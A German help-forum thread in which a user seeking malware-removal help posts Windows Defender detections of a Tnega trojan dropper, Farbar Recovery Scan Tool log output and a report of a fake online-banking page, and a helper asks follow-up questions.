Microsoft Defender Antivirus hat Schadsoftware oder andere potenziell unerwünschte Software erkannt.
Weitere Informationen:
https://go.microsoft.com/fwlink/?linkid=37020&name=App:Chip_Updater_BundleInstaller&threatid=268628&enterprise=0
Name: App:Chip_Updater_BundleInstaller
ID: 268628
Schweregrad: Niedrig
Kategorie: Potenziell unerwünschte Software
Pfad: file:_C:\Users\buskr5\Downloads\Photo Lab - CHIP-Installer.exe
Erkennungsursprung: Lokaler Computer
Erkennungstype: Konkret
Erkennungsquelle: Echtzeitschutz
Benutzer: PC5-L\buskr5
Prozessname: C:\Windows\explorer.exe
Sicherheitsversion: AV: 1.329.1821.0, AS: 1.329.1821.0, NIS: 1.329.1821.0
Modulversion: AM: 1.1.17700.4, NIS: 1.1.17700.4

Date: 2021-01-07 18:42:53.8270000Z
Description: 
Microsoft Defender Antivirus hat Schadsoftware oder andere potenziell unerwünschte Software erkannt.
Weitere Informationen:
https://go.microsoft.com/fwlink/?linkid=37020&name=TrojanDropper:Win64/Tnega!MSR&threatid=2147771646&enterprise=0
Name: TrojanDropper:Win64/Tnega!MSR
ID: 2147771646
Schweregrad: Schwerwiegend
Kategorie: Trojaner - Dropper
Pfad: file:_C:\Users\buskr5\AppData\Local\Temp\GetX64BTIT.exe
Erkennungsursprung: Lokaler Computer
Erkennungstype: Konkret
Erkennungsquelle: Echtzeitschutz
Benutzer: PC5-L\buskr5
Prozessname: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe
Sicherheitsversion: AV: 1.329.1821.0, AS: 1.329.1821.0, NIS: 1.329.1821.0
Modulversion: AM: 1.1.17700.4, NIS: 1.1.17700.4

Date: 2021-01-07 17:18:27.4560000Z
Description: 
Microsoft Defender Antivirus hat Schadsoftware oder andere potenziell unerwünschte Software erkannt.
Weitere Informationen:
https://go.microsoft.com/fwlink/?linkid=37020&name=TrojanDropper:Win64/Tnega!MSR&threatid=2147771646&enterprise=0
Name: TrojanDropper:Win64/Tnega!MSR
ID: 2147771646
Schweregrad: Schwerwiegend
Kategorie: Trojaner - Dropper
Pfad: file:_C:\Users\buskr5\AppData\Local\Temp\GetX64BTIT.exe
Erkennungsursprung: Lokaler Computer
Erkennungstype: Konkret
Erkennungsquelle: Echtzeitschutz
Benutzer: PC5-L\buskr5
Prozessname: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe
Sicherheitsversion: AV: 1.329.1817.0, AS: 1.329.1817.0, NIS: 1.329.1817.0
Modulversion: AM: 1.1.17700.4, NIS: 1.1.17700.4

CodeIntegrity:
===================================

Date: 2021-01-09 15:09:10.7150000Z
Description: 
Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume4\Program Files\Bonjour\mdnsNSP.dll that did not meet the Microsoft signing level requirements.

Date: 2021-01-09 15:09:10.7130000Z
Description: 
Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume4\Program Files\Bonjour\mdnsNSP.dll that did not meet the Microsoft signing level requirements.

Date: 2021-01-09 15:08:55.6300000Z
Description: 
Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume4\Program Files\Bonjour\mdnsNSP.dll that did not meet the Microsoft signing level requirements.

Date: 2021-01-09 15:08:55.6270000Z
Description: 
Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume4\Program Files\Bonjour\mdnsNSP.dll that did not meet the Microsoft signing level requirements.

Date: 2021-01-09 15:08:42.4780000Z
Description: 
Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume4\Program Files\Bonjour\mdnsNSP.dll that did not meet the Microsoft signing level requirements.

Date: 2021-01-09 15:08:42.4760000Z
Description: 
Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume4\Program Files\Bonjour\mdnsNSP.dll that did not meet the Microsoft signing level requirements.

Date: 2021-01-09 15:08:12.9770000Z
Description: 
Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume4\Program Files\Bonjour\mdnsNSP.dll that did not meet the Microsoft signing level requirements.

Date: 2021-01-09 15:08:12.9750000Z
Description: 
Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume4\Program Files\Bonjour\mdnsNSP.dll that did not meet the Microsoft signing level requirements.

==================== Speicherinformationen =========================== 

BIOS: FUJITSU // Insyde Software Corp. Version 2.05 06/25/2019
Hauptplatine: FUJITSU FJNBB5C
Prozessor: Intel(R) Core(TM) i3-6006U CPU @ 2.00GHz
Prozentuale Nutzung des RAM: 46%
Installierter physikalischer RAM: 8088.56 MB
Verfügbarer physikalischer RAM: 4324.07 MB
Summe virtueller Speicher: 9368.56 MB
Verfügbarer virtueller Speicher: 5754.91 MB

==================== Laufwerke ================================

Drive c: () (Fixed) (Total:237.32 GB) (Free:164.78 GB) NTFS

\\?\Volume{d4bd63c3-9f0a-44ee-af4e-35806701b471}\ () (Fixed) (Total:0.49 GB) (Free:0.47 GB) NTFS
\\?\Volume{60a0e813-3eea-47c5-87e8-d6c29f22d114}\ () (Fixed) (Total:0.55 GB) (Free:0.08 GB) NTFS
\\?\Volume{ff4dfa97-53c2-4020-9f39-7bdc41872594}\ () (Fixed) (Total:0.09 GB) (Free:0.07 GB) FAT32

==================== MBR & Partitionstabelle ====================

==========================================================
Disk: 0 (Protective MBR) (Size: 238.5 GB) (Disk ID: 00000000)

Partition: GPT.

==================== Ende von Addition.txt =======================
         

Alt 09.01.2021, 16:34   #2
cosinus
/// Winkelfunktion
/// TB-Süch-Tiger™
 
Windows Defender meldet dauerhaft TrojanDropper:Win64/Tnega!MSR - Standard

Windows Defender meldet dauerhaft TrojanDropper:Win64/Tnega!MSR



Zitat:
Windows Defender meldet dauerhaft TrojanDropper:Win64/Tnega!MSR
Also ein bisschen ausführlicher darfs schon sein. Du hast nur die Überschrift gemacht und dann kommentarlos die Logs reingeknallt. Was wurde denn am Rechner zuvor gemacht?

Zitat:
Benutzer: PC5-L\buskr5
Wenn dieses Benutzerkonto betroffen ist muss man auch sinnigerweise die Logs von diesem User auch aus erstellen und diesem ggf. vorher Adminrechte geben falls er die nicht hat.

Dann seh ich da auch was von DATEV. Nutzt man das privat oder ist das ein gewerblich genutzter PC?
__________________

__________________

Alt 09.01.2021, 18:14   #3
ql-_-lp
 
Windows Defender meldet dauerhaft TrojanDropper:Win64/Tnega!MSR - Standard

Windows Defender meldet dauerhaft TrojanDropper:Win64/Tnega!MSR



Hallo Cosinus,

vielen dank für deine schnelle Antwort.

Dies war mein erster Forumeintrag überhaupt.

Das Thema mit diesem Trojaner ist schon ein Paar mal hier Thematisiert worden. Deswegen hielt ich mich mit langen Ansprechen etwas zurück.

Der PC wird 99% Privat genutzt. Nur das übermitteln der daten an DATEV findet von diesem PC aus statt. Dies wurde noch nicht entkoppelt da es etwas Aufwand bedeutet dies auf einen anderen PC zu übertragen.

Ich habe einen kompletten Scan mit Win Defender gemacht: Es kamen nur solche sachen wie Chip Installer. Diese habe ich gelöscht. Auch der ADW Cleaner hat noch etwas von Chip gefunden. Auch dieses wurde gelöscht.

Jetzt kommt aber wie in den anderen Themen schon behandelt dauerhaft der Win64/Tnega!MSR im defender.

Wenn ich Online Banking machen will schaltet sich eine Identisch aussehende Seite davor und möchte eine Überweisung von 9000€ generieren.

Jetzt folen gleich die zwei logs aus dem Benutzerkonto buskr5

Code:
ATTFilter
Zusätzliches Untersuchungsergebnis von Farbar Recovery Scan Tool (x64) Version: 09-01-2021
durchgeführt von buskr5 (09-01-2021 18:12:15)
Gestartet von C:\Users\buskr5\Downloads
Windows 10 Pro Version 20H2 19042.685 (X64) (2020-07-16 07:02:22)
Start-Modus: Normal
==========================================================


==================== Konten: =============================

Administrator (S-1-5-21-4192198180-2913720414-2796424460-500 - Administrator - Disabled)
buskr5 (S-1-5-21-4192198180-2913720414-2796424460-1002 - Limited - Enabled) => C:\Users\buskr5
DefaultAccount (S-1-5-21-4192198180-2913720414-2796424460-503 - Limited - Disabled)
Gast (S-1-5-21-4192198180-2913720414-2796424460-501 - Limited - Disabled)
ITMueller (S-1-5-21-4192198180-2913720414-2796424460-1001 - Administrator - Enabled) => C:\Users\ITMueller
WDAGUtilityAccount (S-1-5-21-4192198180-2913720414-2796424460-504 - Limited - Disabled)

==================== Sicherheits-Center ========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er entfernt.)

AV: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installierte Programme ======================

(Nur Adware-Programme mit dem Zusatz "Hidden" können in die Fixlist aufgenommen werden, um sie sichtbar zu machen. Die Adware-Programme sollten manuell deinstalliert werden.)

Adobe Acrobat Reader DC - Deutsch (HKLM-x32\...\{AC76BA86-7AD7-1031-7B44-AC0F074E4100}) (Version: 20.013.20074 - Adobe Systems Incorporated)
ALPS Touch Pad Driver (HKLM\...\{9F72EF8B-AEC9-4CA5-B483-143980AFD6FD}) (Version: 10.100.404.117 - Alps Electric)
Apple Application Support (32-Bit) (HKLM-x32\...\{9738288C-21BC-4F54-AB4F-72F059339376}) (Version: 8.6 - Apple Inc.)
Apple Application Support (64-Bit) (HKLM\...\{DEB339C1-2687-43AB-816A-8714F3E26846}) (Version: 8.6 - Apple Inc.)
Apple Mobile Device Support (HKLM\...\{C788AE25-3D4E-4D18-811B-3219F778487E}) (Version: 13.5.1.2 - Apple Inc.)
Apple Software Update (HKLM-x32\...\{A3985C05-7386-411F-A4BF-32A73F37EB44}) (Version: 2.6.3.1 - Apple Inc.)
Bonjour (HKLM\...\{56DDDFB8-7F79-4480-89D5-25E1F52AB28F}) (Version: 3.1.0.1 - Apple Inc.)
DATEV Belegtransfer V.3.5 (HKLM-x32\...\{EC561A24-754E-44F1-B76F-2FDA3DF9E912}) (Version: 2.03 - DATEV eG)
DisplayLink Graphics Driver (HKLM\...\{113EF6B6-57CF-41EA-9F1B-BA50345EDEA5}) (Version: 9.0.1651.0 - DisplayLink Corp.)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 87.0.4280.141 - Google LLC)
Google Update Helper (HKLM-x32\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.36.51 - Google LLC) Hidden
HP Dropbox Plugin (HKLM-x32\...\{1E18E86D-632C-48B5-962C-B60C2E53A478}) (Version: 36.0.41.58587 - HP)
HP Google Drive Plugin (HKLM-x32\...\{039DDA62-50CC-4E7F-9D54-7CF032A2D362}) (Version: 36.0.41.58587 - HP)
HP OfficeJet Pro 7740 series - Grundlegende Software für das Gerät (HKLM\...\{D2C5832A-0287-445C-845F-E53F332C8A18}) (Version: 40.12.1161.1896 - HP Inc.)
HP OfficeJet Pro 7740 series Hilfe (HKLM-x32\...\{5DA0FF5D-80F6-406A-A385-033BA7CBE6B8}) (Version: 39.0.0 - HP)
Intel(R) Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 24.20.100.6290 - Intel Corporation)
iTunes (HKLM\...\{D63C9A58-8F6C-4765-A7B7-6F7711707F46}) (Version: 12.10.8.5 - Apple Inc.)
KOBIL CCID driver x64x86 (HKLM-x32\...\{C5CBEBFF-3DB4-4271-A706-757BBE3BD5AE}) (Version: 1.018.03071 - KOBIL Systems) Hidden
MediaHuman YouTube to MP3 Converter 3.9.9.46 (HKLM-x32\...\MediaHuman YouTube to MP3 Converter_is1) (Version: 3.9.9.46 - MediaHuman)
Microsoft 365 - de-de (HKLM\...\O365HomePremRetail - de-de) (Version: 16.0.13426.20404 - Microsoft Corporation)
Microsoft Edge (HKLM-x32\...\Microsoft Edge) (Version: 87.0.664.75 - Microsoft Corporation)
Microsoft Edge Update (HKLM-x32\...\Microsoft Edge Update) (Version: 1.3.139.59 - )
Microsoft OneDrive (HKU\S-1-5-21-4192198180-2913720414-2796424460-1002\...\OneDriveSetup.exe) (Version: 20.201.1005.0009 - Microsoft Corporation)
Microsoft Visual C++ 2015-2019 Redistributable (x64) - 14.24.28127 (HKLM-x32\...\{282975d8-55fe-4991-bbbb-06a72581ce58}) (Version: 14.24.28127.4 - Microsoft Corporation)
Microsoft Visual C++ 2015-2019 Redistributable (x86) - 14.24.28127 (HKLM-x32\...\{e31cb1a4-76b5-46a5-a084-3fa419e82201}) (Version: 14.24.28127.4 - Microsoft Corporation)
Microsoft Visual C++ 2017 Redistributable (x64) - 14.12.25810 (HKLM-x32\...\{e2ee15e2-a480-4bc5-bfb7-e9803d1d9823}) (Version: 14.12.25810.0 - Microsoft Corporation)
Microsoft Visual C++ 2017 Redistributable (x64) - 14.16.27027 (HKLM-x32\...\{fd9b6070-d13e-45dc-819b-41806bf45b6b}) (Version: 14.16.27027.1 - Microsoft Corporation)
Microsoft Visual C++ 2017 Redistributable (x86) - 14.12.25810 (HKLM-x32\...\{56e11d69-7cc9-40a5-a4f9-8f6190c4d84d}) (Version: 14.12.25810.0 - Microsoft Corporation)
Microsoft Visual C++ 2017 Redistributable (x86) - 14.16.27027 (HKLM-x32\...\{39e28474-b67b-4209-af1b-e9ad0a83d8ca}) (Version: 14.16.27027.1 - Microsoft Corporation)
Mietbus (HKLM-x32\...\ST4UNST #1) (Version:  - )
Office 16 Click-to-Run Extensibility Component (HKLM-x32\...\{90160000-008C-0000-0000-0000000FF1CE}) (Version: 16.0.13426.20404 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Extensibility Component 64-bit Registration (HKLM\...\{90160000-00DD-0000-1000-0000000FF1CE}) (Version: 16.0.13426.20404 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Licensing Component (HKLM\...\{90160000-008F-0000-1000-0000000FF1CE}) (Version: 16.0.13426.20404 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Localization Component (HKLM-x32\...\{90160000-008C-0407-0000-0000000FF1CE}) (Version: 16.0.13426.20404 - Microsoft Corporation) Hidden
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.8816.1 - Realtek Semiconductor Corp.)
Screenpresso (HKU\S-1-5-21-4192198180-2913720414-2796424460-1002\...\Screenpresso) (Version: 1.8.4.0 - Learnpulse)
Shrew Soft VPN Client (HKLM\...\Shrew Soft VPN Client) (Version:  - )
Sicherheitspaket compact (HKLM-x32\...\{0FA40302-24BC-4235-8717-CCAB7D5A3AC2}) (Version: 6.8.102.20294 - DATEV eG) Hidden
Sicherheitspaket compact (HKLM-x32\...\{480df3d6-f2a5-4f2c-8ee3-3079eefa1c61}) (Version: 6.8.102.20294 - DATEV eG)
Sicherheitspaket compact VDST (HKLM-x32\...\{1277C975-FD21-4782-BFD3-6D7BAB7AF466}) (Version: 6.1.100.18178 - DATEV eG) Hidden
Sicherheitspaket compact x64 (HKLM\...\{FE909D88-4863-45D2-9FFB-61CB2DD592F0}) (Version: 6.8.102.20294 - DATEV eG) Hidden
TeamViewer (HKLM-x32\...\TeamViewer) (Version: 15.12.4 - TeamViewer)
Update for Windows 10 for x64-based Systems (KB4023057) (HKLM\...\{32DC821E-4A7D-4878-BEE8-337FA153D7F2}) (Version: 2.63.0.0 - Microsoft Corporation) Hidden
Zoom (HKU\S-1-5-21-4192198180-2913720414-2796424460-1002\...\ZoomUMX) (Version: 5.1 - Zoom Video Communications, Inc.)

Packages:
=========
HP Smart -> C:\Program Files\WindowsApps\AD2F1837.HPPrinterControl_122.1.778.0_x64__v10z8vjag6ke6 [0000-00-00] (HP Inc.)
Media Engine-Add-On für Fotos -> C:\Program Files\WindowsApps\Microsoft.Photos.MediaEngineDLC_1.0.0.0_x64__8wekyb3d8bbwe [0000-00-00] (Microsoft Corporation)
Microsoft Advertising SDK for XAML -> C:\Program Files\WindowsApps\Microsoft.Advertising.Xaml_10.1811.1.0_x64__8wekyb3d8bbwe [0000-00-00] (Microsoft Corporation) [MS Ad]
Microsoft Advertising SDK for XAML -> C:\Program Files\WindowsApps\Microsoft.Advertising.Xaml_10.1811.1.0_x86__8wekyb3d8bbwe [0000-00-00] (Microsoft Corporation) [MS Ad]
Phototastic Collage -> C:\Program Files\WindowsApps\ThumbmunkeysLtd.PhototasticCollage_3.23.1.0_x64__nfy108tqq3p12 [0000-00-00] (Thumbmunkeys Ltd)

==================== Benutzerdefinierte CLSID (Nicht auf der Ausnahmeliste): ==============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} =>  -> Keine Datei
ContextMenuHandlers5: [igfxDTCM] -> {9B5F5829-A529-4B12-814A-E81BCB8D93FC} => C:\WINDOWS\System32\DriverStore\FileRepository\igdlh64.inf_amd64_62f096fe77e085c0\igfxDTCM.dll [2018-11-14] (Microsoft Windows Hardware Compatibility Publisher -> Intel Corporation)

==================== Codecs (Nicht auf der Ausnahmeliste) ====================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt. Die Datei wird nicht verschoben.)

HKU\S-1-5-21-4192198180-2913720414-2796424460-1002\...\Drivers32: [vidc.spv1] => C:\Users\buskr5\AppData\Local\Learnpulse\Screenpresso\ScreenpressoCodec.dll [167656 2021-01-09] (Learnpulse -> LearnPulse)

==================== Verknüpfungen & WMI ========================

==================== Geladene Module (Nicht auf der Ausnahmeliste) =============

==================== Alternate Data Streams (Nicht auf der Ausnahmeliste) ========

==================== Abgesicherter Modus (Nicht auf der Ausnahmeliste) ==================

==================== Verknüpfungen (Nicht auf der Ausnahmeliste) =================

==================== Internet Explorer (Nicht auf der Ausnahmeliste) ==========

BHO: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX64\Microsoft Office\Office16\OCHelper.dll [2020-09-16] (Microsoft Corporation -> Microsoft Corporation)
BHO: SCardBHOEvent Class -> {AF8CD625-E04A-4A8F-A90A-0C74846C2E30} -> C:\Program Files (x86)\DATEV\PROGRAMM\SiPaCompact\DVCCSAScardBHO64002.dll [2020-10-20] (DATEV eG 08 2 -> DATEV eG)
BHO-x32: SCardBHOEvent Class -> {AF8CD625-E04A-4A8F-A90A-0C74846C2E30} -> C:\Program Files (x86)\DATEV\PROGRAMM\SiPaCompact\DVCCSAScardBHO002.dll [2020-10-20] (DATEV eG 08 2 -> DATEV eG)
Handler-x32: mso-minsb-roaming.16 - {83C25742-A9F7-49FB-9138-434302C88D07} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2020-12-06] (Microsoft Corporation -> Microsoft Corporation)
Handler-x32: mso-minsb.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2020-12-06] (Microsoft Corporation -> Microsoft Corporation)
Handler-x32: osf-roaming.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2020-12-06] (Microsoft Corporation -> Microsoft Corporation)
Handler-x32: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2020-12-06] (Microsoft Corporation -> Microsoft Corporation)

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt.)

IE trusted site: HKU\S-1-5-21-4192198180-2913720414-2796424460-1002\...\bstbk-vollmachtsdatenbank.de -> hxxp://bstbk-vollmachtsdatenbank.de
IE trusted site: HKU\S-1-5-21-4192198180-2913720414-2796424460-1002\...\bstbk-vollmachtsdatenbank.de -> hxxps://bstbk-vollmachtsdatenbank.de
IE trusted site: HKU\S-1-5-21-4192198180-2913720414-2796424460-1002\...\datev.de -> hxxp://download.datev.de
IE trusted site: HKU\S-1-5-21-4192198180-2913720414-2796424460-1002\...\datev.de -> hxxps://download.datev.de
IE trusted site: HKU\S-1-5-21-4192198180-2913720414-2796424460-1002\...\sharepoint.com -> hxxps://rswm-files.sharepoint.com

==================== Hosts Inhalt: =========================

(Wenn benötigt kann der Hosts: Schalter in die Fixlist aufgenommen werden um die Hosts Datei zurückzusetzen.)

2018-04-12 00:38 - 2018-04-12 00:36 - 000000824 _____ C:\WINDOWS\system32\drivers\etc\hosts

==================== Andere Bereiche ===========================

(Aktuell gibt es keinen automatisierten Fix für diesen Bereich.)

HKU\S-1-5-21-4192198180-2913720414-2796424460-1002\Control Panel\Desktop\\Wallpaper -> C:\Users\buskr5\AppData\Local\Microsoft\Windows\Themes\RoamedThemeFiles\DesktopBackground\img-20170430-wa0003.jpg
DNS Servers: 192.168.178.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer => (SmartScreenEnabled: )
 ist aktiviert.

Network Binding:
=============
Ethernet: Shrew Soft Lightweight Filter -> vflt (enabled) 
WLAN: Shrew Soft Lightweight Filter -> vflt (enabled) 

==================== MSCONFIG/TASK MANAGER Deaktivierte Einträge ==

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er entfernt.)

HKLM\...\StartupApproved\StartupFolder: => "ControlCenter.lnk"
HKLM\...\StartupApproved\Run: => "RTHDVCPL"
HKU\S-1-5-21-4192198180-2913720414-2796424460-1002\...\StartupApproved\Run: => "OneDrive"

==================== Firewall Regeln (Nicht auf der Ausnahmeliste) ================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

FirewallRules: [{166A50AB-BA35-4DC0-94F9-86E3C7612B7F}] => (Allow) C:\Program Files\HP\HP OfficeJet Pro 7740 series\bin\FaxApplications.exe (Hewlett Packard -> HP Inc.)
FirewallRules: [{E39623A3-4694-43EA-861D-846DE1BBE081}] => (Allow) C:\Program Files\HP\HP OfficeJet Pro 7740 series\bin\DigitalWizards.exe (Hewlett Packard -> HP Inc.)
FirewallRules: [{41F20948-57E6-48C0-B787-8E350E0F4AE3}] => (Allow) C:\Program Files\HP\HP OfficeJet Pro 7740 series\bin\SendAFax.exe (Hewlett Packard -> HP Inc.)
FirewallRules: [{9EC5C841-0316-4C4C-8AC6-5D47D1515E43}] => (Allow) C:\Program Files\HP\HP OfficeJet Pro 7740 series\bin\FaxPrinterUtility.exe (Hewlett Packard -> HP Inc.)
FirewallRules: [{2C47819B-0C76-41E7-8951-FF9884032B29}] => (Allow) C:\Program Files\HP\HP OfficeJet Pro 7740 series\Bin\DeviceSetup.exe (Hewlett Packard -> HP Inc.)
FirewallRules: [{A528EDB2-5B14-4C19-840E-E50161882359}] => (Allow) LPort=5357
FirewallRules: [{35A9C84E-C44A-4EB6-A179-101E53499E5B}] => (Allow) C:\Program Files\HP\HP OfficeJet Pro 7740 series\Bin\HPNetworkCommunicatorCom.exe (Hewlett Packard -> HP Inc.)
FirewallRules: [{DF2A37A0-22B5-4F56-BEF2-D55F24A9E8A6}] => (Allow) C:\Users\buskr5\AppData\Local\Temp\7zS65B4\HPDiagnosticCoreUI.exe => Keine Datei
FirewallRules: [{6C39964B-8607-462D-BADE-7B852BCE9A96}] => (Allow) C:\Users\buskr5\AppData\Local\Temp\7zS65B4\HPDiagnosticCoreUI.exe => Keine Datei
FirewallRules: [{DEC7E16E-33C1-4DE9-A3C5-D9205AEE5645}] => (Allow) C:\Users\buskr5\AppData\Local\Temp\7zS6950\HPDiagnosticCoreUI.exe => Keine Datei
FirewallRules: [{24C9FA9C-13A2-43E7-A79D-703A70335C05}] => (Allow) C:\Users\buskr5\AppData\Local\Temp\7zS6950\HPDiagnosticCoreUI.exe => Keine Datei
FirewallRules: [{65C8E351-555D-4A86-9AB3-CD29636B7DA9}] => (Allow) C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [{E69D8B9E-7CEB-410C-8145-C81E4CCB8E77}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [{BC66B58C-B648-4497-889E-7FB43E3E140B}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [{9CF1E217-96B2-4C50-B89D-32E490BC3A5D}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [{C0B9ABF0-C6CA-44B7-9DF8-6AE21BACF8B7}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [{EBD4A9EA-A5CF-42F3-999B-FC71F044B516}] => (Allow) C:\Program Files\iTunes\iTunes.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [TCP Query User{6A280486-017D-4867-948B-EF1175A2B9A1}C:\users\buskr5\appdata\local\microsoft\teams\current\teams.exe] => (Allow) C:\users\buskr5\appdata\local\microsoft\teams\current\teams.exe => Keine Datei
FirewallRules: [UDP Query User{3098913F-3817-46A9-B646-AEE9F468614B}C:\users\buskr5\appdata\local\microsoft\teams\current\teams.exe] => (Allow) C:\users\buskr5\appdata\local\microsoft\teams\current\teams.exe => Keine Datei
FirewallRules: [{24B5A986-5521-4ED0-9467-91D2225031A8}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\outlook.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{7510E694-223F-4E51-80DD-869688F9BE1F}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe (TeamViewer Germany GmbH -> TeamViewer Germany GmbH)
FirewallRules: [{5EDC0426-307F-4140-BC21-6F42F1A6D414}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe (TeamViewer Germany GmbH -> TeamViewer Germany GmbH)
FirewallRules: [{ACF9D1E2-41C9-4BCA-BFDE-C58E7AEB1799}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe (TeamViewer Germany GmbH -> TeamViewer Germany GmbH)
FirewallRules: [{9C443C88-A482-48E0-A390-269EC8292DA5}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe (TeamViewer Germany GmbH -> TeamViewer Germany GmbH)
FirewallRules: [{C2472821-64AA-418D-B658-F3DC8B7D5DC9}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google LLC -> Google LLC)

==================== Wiederherstellungspunkte =========================

ACHTUNG: Systemwiederherstellung ist deaktiviert (Total:237.32 GB) (Free:165.13 GB) (70%)
Überprüfen Sie den "VSS" Dienst


==================== Fehlerhafte Geräte im Gerätemanager ============

Name: Shrew Soft Virtual Adapter
Description: Shrew Soft Virtual Adapter
Class Guid: {4d36e972-e325-11ce-bfc1-08002be10318}
Manufacturer: Shrew Soft
Service: vnet
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.


==================== Fehlereinträge in der Ereignisanzeige: ========================

Applikationsfehler:
==================
Error: (01/07/2021 06:49:16 PM) (Source: Microsoft-Windows-Perflib) (EventID: 1023) (User: NT-AUTORITÄT)
Description: Windows kann die erweiterbare Leistungsindikator-DLL "C:\WINDOWS\system32\sysmain.dll" nicht laden (Win32-Fehlercode 126).

Error: (01/02/2021 03:32:14 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Name der fehlerhaften Anwendung: ImagingDevices.exe, Version: 10.0.19041.1, Zeitstempel: 0x5fcdec8b
Name des fehlerhaften Moduls: unknown, Version: 0.0.0.0, Zeitstempel: 0x00000000
Ausnahmecode: 0xc0000005
Fehleroffset: 0x03233f2e
ID des fehlerhaften Prozesses: 0x285c
Startzeit der fehlerhaften Anwendung: 0x01d6e10e6233e2ba
Pfad der fehlerhaften Anwendung: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe
Pfad des fehlerhaften Moduls: unknown
Berichtskennung: 3506c912-b109-489b-8830-af7cc925d766
Vollständiger Name des fehlerhaften Pakets: 
Anwendungs-ID, die relativ zum fehlerhaften Paket ist:

Error: (12/31/2020 02:05:44 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: Das Programm explorer.exe Version 10.0.19041.662 hat die Interaktion mit Windows beendet und wurde geschlossen. Überprüfen Sie den Problemverlauf in der Systemsteuerung "Sicherheit und Wartung", um nach weiteren Informationen zum Problem zu suchen.

Prozess-ID: 4c0

Startzeit: 01d6df75472ad580

Beendigungszeit: 0

Anwendungspfad: C:\Windows\explorer.exe

Bericht-ID: 50412b09-f1e4-4dee-b71c-7bcde27d67b3

Vollständiger Name des fehlerhaften Pakets: 

Relative Anwendungs-ID des fehlerhaften Pakets: 

Absturztyp: Unknown

Error: (12/31/2020 02:04:42 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: Das Programm EXCEL.EXE Version 16.0.13426.20404 hat die Interaktion mit Windows beendet und wurde geschlossen. Überprüfen Sie den Problemverlauf in der Systemsteuerung "Sicherheit und Wartung", um nach weiteren Informationen zum Problem zu suchen.

Prozess-ID: 838

